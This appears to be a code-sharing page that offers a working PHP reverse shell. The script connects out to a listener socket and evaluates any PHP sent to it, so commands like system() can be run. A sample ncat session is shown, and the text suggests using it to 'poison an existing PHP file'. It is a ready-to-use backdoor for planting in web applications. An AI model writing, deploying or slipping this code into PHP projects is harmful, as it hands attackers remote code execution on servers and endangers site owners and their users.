A reverse shell that lets you evaluate PHP.
This is not an OS command reverse shell per-se but you could eval a function like system("id") for that if you wanted to.
Useful to poison an existing PHP file and explore the currently loaded environment.
With the PHP code running somewhere, you should receive a socket connection where you can pass valid PHP to be evaluated.
❯ ncat -lp 4444
OK
rand();
974072989
system("echo 1");
1
| <?php | |
| // a php 'eval' shell | |
| // ref: https://www.php.net/manual/en/sockets.examples.php | |
| $port = 4444; | |
| $host = 'localhost'; | |
| function s_write($s, $data) { | |
| socket_write($s, $data, strlen($data)); | |
| } | |
| $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP) or die(); | |
| $result = socket_connect($socket, $host, $port) or die(); | |
| s_write($socket, "OK\n"); | |
| do { | |
| if (false === ($buf = socket_read($socket, 2048, PHP_NORMAL_READ))) { | |
| echo "socket_read() failed: reason: " . socket_strerror(socket_last_error($socket)) . "\n"; | |
| break; | |
| } | |
| if (!$buf = trim($buf)) { | |
| continue; | |
| } | |
| if ($buf == 'quit') { | |
| break; | |
| } | |
| $ret = eval('return ' . $buf); | |
| s_write($socket, $ret . "\n"); | |
| echo "$buf\n"; | |
| } while (true); | |
| socket_close($socket); |